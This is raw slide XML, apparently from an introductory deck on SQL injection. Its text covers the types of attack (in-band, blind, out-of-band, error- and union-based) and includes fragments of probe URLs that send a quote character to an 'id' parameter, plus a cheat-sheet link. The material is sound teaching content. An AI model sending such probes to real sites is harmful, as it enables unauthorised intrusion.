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010044" y="5282352"/>
            <a:ext cx="4960686" cy="4611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190779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="207949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20102843" y="207949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20102843" y="190779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010044" y="5282352"/>
            <a:ext cx="4960686" cy="4611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817964" y="190779"/>
            <a:ext cx="8285480" cy="11118215"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8285480" h="11118215">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8284878" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8284878" y="11117776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11117776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="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87337" y="3689102"/>
            <a:ext cx="5196909" cy="4478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0922" y="804755"/>
            <a:ext cx="18842255" cy="1343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7857" y="2709341"/>
            <a:ext cx="16978630" cy="7700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ndom.com/app.php?id=%27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ndom.com/app.php?id=%27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ndom.com/app.php?id=1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ndom.com/app.php?id=1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ntestmonkey.net/category/cheat-sheet/sql-injection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2843" cy="1130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3561" y="7419951"/>
            <a:ext cx="9728200" cy="1979295"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:ln w="7853">
            <a:solidFill>
              <a:srgbClr val="ED7D3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51790">
              <a:lnSpc>
                <a:spcPts val="14135"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="12100" spc="-530">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="12100" spc="-1370">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="12100" spc="-715">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INJECTION</a:t>
            </a:r>
            <a:endParaRPr sz="12100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5619095" y="841859"/>
            <a:ext cx="6255385" cy="5800090"/>
            <a:chOff x="5619095" y="841859"/>
            <a:chExt cx="6255385" cy="5800090"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8230115" y="3000536"/>
              <a:ext cx="3643868" cy="36413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19095" y="841859"/>
              <a:ext cx="3535808" cy="35383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52391" y="2460239"/>
              <a:ext cx="670974" cy="6709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 rot="20040000">
            <a:off x="8668470" y="2076927"/>
            <a:ext cx="804117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40"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="-375">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TRU</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" baseline="1068" sz="3900" spc="-562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baseline="1068" sz="3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727798" y="1783698"/>
            <a:ext cx="700405" cy="644525"/>
            <a:chOff x="9727798" y="1783698"/>
            <a:chExt cx="700405" cy="644525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9733195" y="1789095"/>
              <a:ext cx="485775" cy="487680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="485775" h="487680">
                  <a:moveTo>
                    <a:pt x="63630" y="87069"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="100357" y="52371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141612" y="26209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186014" y="8709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232183" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278739" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324302" y="9455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367490" y="27874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406923" y="55588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439685" y="90940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463740" y="131261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479028" y="175167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485489" y="221274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483062" y="268195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471688" y="314546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451307" y="358942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421858" y="399998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385132" y="434697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343877" y="460859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299475" y="478358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253305" y="487068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206749" y="486862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161187" y="477612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117998" y="459194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78565" y="431479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45803" y="396127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21748" y="355806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6460" y="311900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="265794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2426" y="218873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13800" y="172522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34181" y="128126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63630" y="8706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936812" y="1935321"/>
              <a:ext cx="485775" cy="487680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="485775" h="487680">
                  <a:moveTo>
                    <a:pt x="63630" y="87069"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="100357" y="52371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141612" y="26209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186014" y="8709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232183" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278739" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324302" y="9455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367490" y="27874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406923" y="55588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439685" y="90940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463740" y="131261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479028" y="175167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485489" y="221274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483062" y="268195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471688" y="314546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451307" y="358942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421858" y="399998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385132" y="434697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343877" y="460859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299475" y="478358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253305" y="487068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206749" y="486862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161187" y="477612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117998" y="459194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78565" y="431479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45803" y="396127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21748" y="355806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6460" y="311900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="265794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2426" y="218873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13800" y="172522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34181" y="128126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63630" y="8706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 rot="1740000">
            <a:off x="10634499" y="1971918"/>
            <a:ext cx="862241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40"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" baseline="1068" sz="3900" spc="-652">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FAL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="-434">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>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67648" y="2372283"/>
            <a:ext cx="982587" cy="982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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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4260823" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260823" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426082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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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753015" y="6126589"/>
            <a:ext cx="378396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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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74959" y="6984237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59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434928" y="701488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59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32349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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr sz="44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28010" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="44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93871" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
